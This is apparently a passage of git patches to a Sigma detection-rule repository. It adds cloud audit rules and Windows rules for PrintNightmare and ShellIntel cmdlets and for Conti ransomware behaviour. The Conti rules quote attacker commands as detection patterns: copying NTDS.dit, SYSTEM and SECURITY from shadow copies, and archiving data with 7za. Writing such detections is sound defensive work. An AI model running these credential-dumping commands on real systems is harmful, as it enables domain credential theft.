index ea53d709..dea41ce3 100644 --- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml @@ -1,11 +1,11 @@ title: AWS EFS Fileshare Modified or Deleted -id: 6a7ba45c-63d8-473e-9736-2eaabff79964 +id: 25cb1ba1-8a19-4a23-a198-d252664c8cef status: experimental description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, you must first delete them, so deletion of a mount will occur before deletion of a Fileshare. author: austin Songer @austinsonger date: 2021/08/15 references: - - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html + - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html logsource: service: cloudtrail detection: From dae3d3b446c9f847518e851a723ccac38d4cc0d6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:42:15 -0500 Subject: [PATCH 0371/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- ...lp_re-identifies_sensitive_information.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 8b137891..6263e3ac 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1 +1,21 @@ +title: Google Cloud Re-identifies Sensitive Information. +id: 234f9f48-904b-4736-a34c-55d23919e4b7 +description: Identifies when sensitive information is re-identifies in google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/15 +references: + - https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - projects.content.reidentify + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unkown From a37ec60f768f78a03c4cdeb07cc19b23a81be081 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:44:20 -0500 Subject: [PATCH 0372/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 6263e3ac..b38d39ae 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1,7 +1,7 @@ title: Google Cloud Re-identifies Sensitive Information. id: 234f9f48-904b-4736-a34c-55d23919e4b7 -description: Identifies when sensitive information is re-identifies in google Cloud. +description: Identifies when sensitive information is re-identified in google Cloud. author: Austin Songer status: experimental date: 2021/08/15 From 3c770c6e4d685da339c0e08445c85a5c087b5c93 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 15:55:46 -0500 Subject: [PATCH 0373/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index b38d39ae..4cebb946 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1,4 +1,3 @@ - title: Google Cloud Re-identifies Sensitive Information. id: 234f9f48-904b-4736-a34c-55d23919e4b7 description: Identifies when sensitive information is re-identified in google Cloud. From e4314aa4b8ca93ada9970f1843e867cd4c3c581c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 16:01:10 -0500 Subject: [PATCH 0374/1367] Update gcp_dns_zone_modified_or_deleted.yml --- .../gcp/gcp_dns_zone_modified_or_deleted.yml | 23 ++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml index 8b137891..519352c8 100644 --- a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -1 +1,22 @@ - +title: Google Cloud DNS Zone Modified or Deleted +id: 28268a8f-191f-4c17-85b2-f5aa4fa829c3 +description: Identifies when a DNS Zone is modified or deleted in Google Cloud. +author: Austin Songer +status: experimental +date: 2021/08/15 +references: + - https://cloud.google.com/dns/docs/reference/v1/managedZones +logsource: + service: gcp.audit +detection: + selection: + gcp.audit.method_name: + - Dns.ManagedZones.Delete + - Dns.ManagedZones.Update + - Dns.ManagedZones.Patch + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unkown From 219be99847037bd389f6e80b7745945e622efdcb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 16:02:04 -0500 Subject: [PATCH 0375/1367] Update gcp_dns_zone_modified_or_deleted.yml --- rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml index 519352c8..cbd76394 100644 --- a/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml +++ b/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Google Cloud DNS Zone Modified or Deleted id: 28268a8f-191f-4c17-85b2-f5aa4fa829c3 description: Identifies when a DNS Zone is modified or deleted in Google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/15 references: From 85dc62070ba01e2c74a7f077f970038aa3760f23 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 16:02:12 -0500 Subject: [PATCH 0376/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 4cebb946..54688a52 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -1,7 +1,7 @@ title: Google Cloud Re-identifies Sensitive Information. id: 234f9f48-904b-4736-a34c-55d23919e4b7 description: Identifies when sensitive information is re-identified in google Cloud. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/08/15 references: From ebf2b7a313cd3e92db134196ae0a4bec72d66153 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:49:01 -0500 Subject: [PATCH 0377/1367] Update aws_efs_fileshare_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml index dea41ce3..0b675c18 100644 --- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EFS Fileshare Modified or Deleted id: 25cb1ba1-8a19-4a23-a198-d252664c8cef status: experimental -description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, you must first delete them, so deletion of a mount will occur before deletion of a Fileshare. +description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. author: austin Songer @austinsonger date: 2021/08/15 references: From 5a22d07392efb1ab241dc16b6e0ed6695a5728ba Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:52:41 -0500 Subject: [PATCH 0378/1367] Update aws_efs_fileshare_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml index 0b675c18..cd4b6d12 100644 --- a/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml @@ -2,7 +2,7 @@ title: AWS EFS Fileshare Modified or Deleted id: 25cb1ba1-8a19-4a23-a198-d252664c8cef status: experimental description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. -author: austin Songer @austinsonger +author: Austin Songer @austinsonger date: 2021/08/15 references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html From fb117d57147cd21eaf41c3ad1890eb4dcea5d955 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:52:53 -0500 Subject: [PATCH 0379/1367] Update aws_efs_fileshare_mount_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml index fee2a025..cd86285f 100644 --- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -2,7 +2,7 @@ title: AWS EFS Fileshare Mount Modified or Deleted id: 6a7ba45c-63d8-473e-9736-2eaabff79964 status: experimental description: Detects when a EFS Fileshare Mount is modified or deleted. This will break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. -author: austin Songer @austinsonger +author: Austin Songer @austinsonger date: 2021/08/15 references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html From 2524adc6ca55811dd1e2cce240f455a5673439c9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:54:11 -0500 Subject: [PATCH 0380/1367] Update aws_efs_fileshare_mount_modified_or_deleted.yml --- rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml index cd86285f..b7bcf6e1 100644 --- a/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: AWS EFS Fileshare Mount Modified or Deleted id: 6a7ba45c-63d8-473e-9736-2eaabff79964 status: experimental -description: Detects when a EFS Fileshare Mount is modified or deleted. This will break any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. +description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. author: Austin Songer @austinsonger date: 2021/08/15 references: From ae12f1f32800e0d61feb22f34ae609389749161f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 15 Aug 2021 22:57:54 -0500 Subject: [PATCH 0381/1367] Update gcp_dlp_re-identifies_sensitive_information.yml --- rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 54688a52..97b4a3aa 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -16,5 +16,6 @@ detection: level: medium tags: - attack.impact + - attack.t1565 falsepositives: - Unkown From 37b8040e7666d055287f24ea22c77a5b45e02a6e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 06:28:40 +0200 Subject: [PATCH 0382/1367] cleanup gcp_dlp_re-identifies_sensitive_information Remove list with only 1 value --- .../cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml index 97b4a3aa..3ba671a0 100644 --- a/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml +++ b/rules/cloud/gcp/gcp_dlp_re-identifies_sensitive_information.yml @@ -10,8 +10,7 @@ logsource: service: gcp.audit detection: selection: - gcp.audit.method_name: - - projects.content.reidentify + gcp.audit.method_name: projects.content.reidentify condition: selection level: medium tags: From d2a35edae9c4d44ac2c9f53b5fa1a0e23923edd3 Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Mon, 16 Aug 2021 08:42:17 +0200 Subject: [PATCH 0383/1367] fix: Remove powershell_alternate_hosts from PR Remove a rule using Host Application (which may or may not exist, based on the log parser) from the PR. A future PR will clean up rules using Host Application. --- .../powershell/powershell_alternate_powershell_hosts.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml index 8eec258c..dcf6fb16 100644 --- a/rules/windows/powershell/powershell_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_alternate_powershell_hosts.yml @@ -19,7 +19,10 @@ falsepositives: level: medium detection: filter: - ContextInfo: 'powershell.exe' + - ContextInfo: 'powershell.exe' + - Message: 'powershell.exe' + # Both fields contain key=value pairs where the key HostApplication is relevant but + # can't be referred directly as event field. condition: selection and not filter --- From 5b60e0ea5ab8e1dc56fe371f4be3bc48f9592c0b Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Mon, 16 Aug 2021 09:10:05 +0200 Subject: [PATCH 0384/1367] feat: Add some rules to detect Conti behaviour Add rules based on the leaks from the Conti group to detect malicious behaviour. --- .../powershell_invoke_nightmare.yml | 21 +++++++++++++++ ...shell_shellintel_malicious_commandlets.yml | 27 +++++++++++++++++++ .../process_creation/win_malware_conti.yml | 24 +++++++++++++++++ .../win_malware_conti_7zip.yml | 20 ++++++++++++++ .../win_malware_conti_shadowcopy.yml | 25 +++++++++++++++++ .../win_susp_cmd_shadowcopy_access.yml | 19 +++++++++++++ 6 files changed, 136 insertions(+) create mode 100644 rules/windows/powershell/powershell_invoke_nightmare.yml create mode 100644 rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml create mode 100644 rules/windows/process_creation/win_malware_conti.yml create mode 100644 rules/windows/process_creation/win_malware_conti_7zip.yml create mode 100644 rules/windows/process_creation/win_malware_conti_shadowcopy.yml create mode 100644 rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml new file mode 100644 index 00000000..790778af --- /dev/null +++ b/rules/windows/powershell/powershell_invoke_nightmare.yml @@ -0,0 +1,21 @@ +title: PrintNightmare Powershell Exploitation +id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf +status: experimental +description: Detects Commandlet name for PrintNightmare exploitation. +date: 2021/08/09 +references: + - https://github.com/calebstewart/CVE-2021-1675 +author: Max Altgelt, Tobias Michalski +logsource: + product: windows + service: powershell + definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. +detection: + selection: + EventID: 4104 + ScriptBlockText: + - Invoke-Nightmare + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml new file mode 100644 index 00000000..e65c3c23 --- /dev/null +++ b/rules/windows/powershell/powershell_shellintel_malicious_commandlets.yml @@ -0,0 +1,27 @@ +title: Malicious ShellIntel PowerShell Commandlets +id: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7 +status: experimental +description: Detects Commandlet names from ShellIntel exploitation scripts. +date: 2021/08/09 +references: + - https://github.com/Shellntel/scripts/ +tags: + - attack.execution + - attack.t1059.001 +author: Max Altgelt, Tobias Michalski +logsource: + product: windows + service: powershell + definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. +detection: + selection: + EventID: 4104 + ScriptBlockText: + - Invoke-SMBAutoBrute + - Invoke-GPOLinks + - Out-Minidump + - Invoke-Potato + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml new file mode 100644 index 00000000..7e3e32d4 --- /dev/null +++ b/rules/windows/process_creation/win_malware_conti.yml @@ -0,0 +1,24 @@ +title: Conti Volume Shadow Listing +id: 7b30e0a7-c675-4b24-8a46-82fa67e2433d +description: Detects a command used by conti to find volume shadow backups +author: Max Altgelt, Tobias Michalski +date: 2021/08/09 +status: experimental +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - 'vssadmin list shadows' + - 'log.txt' + condition: 1 of them +fields: + - User + - CommandLine + - ParentImage +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml new file mode 100644 index 00000000..4023e89b --- /dev/null +++ b/rules/windows/process_creation/win_malware_conti_7zip.yml @@ -0,0 +1,20 @@ +title: Conti Volume Shadow Listing +id: aa92fd02-09f2-48b0-8a93-864813fb8f41 +description: Detects a command used by conti to exfiltrate NTDS +author: Max Altgelt, Tobias Michalski +date: 2021/08/09 +status: experimental +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 +logsource: + category: process_creation + product: windows +detection: + selection_1: + CommandLine|contains|all: + - '7za.exe' + - '\\C$\\temp\\log.zip' + condition: all of them +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml new file mode 100644 index 00000000..babdb8d3 --- /dev/null +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -0,0 +1,25 @@ +title: Conti Volume Shadow Listing +id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 +description: Detects a command used by conti to access volume shadow backups +author: Max Altgelt, Tobias Michalski +date: 2021/08/09 +status: experimental +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 +logsource: + category: process_creation + product: windows +detection: + selection_1: + CommandLine|contains: + - '\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' + selection_2: + CommandLine|contains: + - '\\NTDS.dit' + - '\\SYSTEM' + - '\\SECURITY' + - 'C:\\tmp\\log' + condition: all of them +falsepositives: + - Some rare backup scenarios +level: medium diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml new file mode 100644 index 00000000..14509d5e --- /dev/null +++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml @@ -0,0 +1,19 @@ +title: Conti Volume Shadow Listing +id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 +description: Detects a command used by conti to access volume shadow backups +author: Max Altgelt, Tobias Michalski +date: 2021/08/09 +status: experimental +references: + - https://twitter.com/vxunderground/status/1423336151860002816?s=20 +logsource: + category: process_creation + product: windows +detection: + selection_1: + CommandLine|contains: + - 'copy \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' + condition: all of them +falsepositives: + - Some rare backup scenarios +level: medium From e8723e892aa7a518b3d2ba638e4352efef0e9b8e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:19:10 +0200 Subject: [PATCH 0385/1367] clean-up powershell_invoke_nightmare.yml --- rules/windows/powershell/powershell_invoke_nightmare.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml index 790778af..9d7443ed 100644 --- a/rules/windows/powershell/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_invoke_nightmare.yml @@ -13,8 +13,7 @@ logsource: detection: selection: EventID: 4104 - ScriptBlockText: - - Invoke-Nightmare + ScriptBlockText: Invoke-Nightmare condition: selection falsepositives: - Unknown From 26d632bf052502104300098dcdbb067cc0729997 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:19:46 +0200 Subject: [PATCH 0386/1367] fix condition --- rules/windows/process_creation/win_malware_conti.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml index 7e3e32d4..45a57e0a 100644 --- a/rules/windows/process_creation/win_malware_conti.yml +++ b/rules/windows/process_creation/win_malware_conti.yml @@ -14,7 +14,7 @@ detection: CommandLine|contains|all: - 'vssadmin list shadows' - 'log.txt' - condition: 1 of them + condition: selection fields: - User - CommandLine From ed424c55c81cc69e480266198c398e5c47c468c7 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:20:25 +0200 Subject: [PATCH 0387/1367] fix selection --- rules/windows/process_creation/win_malware_conti_7zip.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml index 4023e89b..7f5cbeb0 100644 --- a/rules/windows/process_creation/win_malware_conti_7zip.yml +++ b/rules/windows/process_creation/win_malware_conti_7zip.yml @@ -10,11 +10,11 @@ logsource: category: process_creation product: windows detection: - selection_1: + selection: CommandLine|contains|all: - '7za.exe' - '\\C$\\temp\\log.zip' - condition: all of them + condition: selection falsepositives: - Unknown level: high From 5b09dff1fbd162dbc92c6e3d5a39014e8ad8d4ae Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:21:04 +0200 Subject: [PATCH 0388/1367] cleanup win_malware_conti_shadowcopy.yml --- .../windows/process_creation/win_malware_conti_shadowcopy.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index babdb8d3..105e17ae 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -11,8 +11,7 @@ logsource: product: windows detection: selection_1: - CommandLine|contains: - - '\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' + CommandLine|contains: '\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' selection_2: CommandLine|contains: - '\\NTDS.dit' From fb80b35141551425c2f37f4ca7ad8f95be28b3f6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:21:38 +0200 Subject: [PATCH 0389/1367] fix condition --- .../process_creation/win_susp_cmd_shadowcopy_access.yml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml index 14509d5e..5c5f1de5 100644 --- a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml +++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml @@ -10,10 +10,9 @@ logsource: category: process_creation product: windows detection: - selection_1: - CommandLine|contains: - - 'copy \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' - condition: all of them + selection: + CommandLine|contains: 'copy \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy' + condition: selection falsepositives: - Some rare backup scenarios level: medium From 78e2c0da92a1b3acde6f3a2931b872a5e12fb765 Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Mon, 16 Aug 2021 09:26:45 +0200 Subject: [PATCH 0390/1367] fix: Clean up duplicated ID --- rules/windows/process_creation/win_malware_conti_shadowcopy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 105e17ae..71cfae6b 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -1,5 +1,5 @@ title: Conti Volume Shadow Listing -id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 +id: ff4bf8d6-751f-417c-8111-3ba1d9bbdcf6 description: Detects a command used by conti to access volume shadow backups author: Max Altgelt, Tobias Michalski date: 2021/08/09 From dc9bb22a008c39c719e42fca42dcb89c5d5a57b7 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 16 Aug 2021 09:29:22 +0200 Subject: [PATCH 0391/1367] fix duplicate id --- rules/windows/process_creation/win_malware_conti_shadowcopy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 71cfae6b..73c8c6a9 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -1,5 +1,5 @@ title: Conti Volume Shadow Listing -id: ff4bf8d6-751f-417c-8111-3ba1d9bbdcf6 +id: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d description: Detects a command used by conti to access volume shadow backups author: Max Altgelt, Tobias Michalski date: 2021/08/09 From f8bedfa759fe71c0d65695e2da8732dcc42c2162 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 16 Aug 2021 10:12:35 +0200 Subject: [PATCH 0392/1367] docs: added link to leak file on VT --- rules/windows/process_creation/win_malware_conti.yml | 1 + rules/windows/process_creation/win_malware_conti_7zip.yml | 1 + rules/windows/process_creation/win_malware_conti_shadowcopy.yml | 1 + .../windows/process_creation/win_susp_cmd_shadowcopy_access.yml | 1 + 4 files changed, 4 insertions(+) diff --git a/rules/windows/process_creation/win_malware_conti.yml b/rules/windows/process_creation/win_malware_conti.yml index 45a57e0a..c529a3ba 100644 --- a/rules/windows/process_creation/win_malware_conti.yml +++ b/rules/windows/process_creation/win_malware_conti.yml @@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_malware_conti_7zip.yml b/rules/windows/process_creation/win_malware_conti_7zip.yml index 7f5cbeb0..15198fae 100644 --- a/rules/windows/process_creation/win_malware_conti_7zip.yml +++ b/rules/windows/process_creation/win_malware_conti_7zip.yml @@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml index 73c8c6a9..3292bcba 100644 --- a/rules/windows/process_creation/win_malware_conti_shadowcopy.yml +++ b/rules/windows/process_creation/win_malware_conti_shadowcopy.yml @@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml index 5c5f1de5..319eef8e 100644 --- a/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml +++ b/rules/windows/process_creation/win_susp_cmd_shadowcopy_access.yml @@ -6,6 +6,7 @@ date: 2021/08/09 status: experimental references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 + - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection logsource: category: process_creation product: windows From 40018eef7f102e85ce4788a3540b07806d70c2c1 Mon Sep 17 00:00:00 2001 From: Theo Guidoux Date: Mon, 16 Aug 2021 10:44:01 +0200 Subject: [PATCH 0393/1367] edit help + case where 'select=' --- tools/sigma/backends/sql.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/sql.py b/tools/sigma/backends/sql.py index cd0b8647..18f8ab30 100644 --- 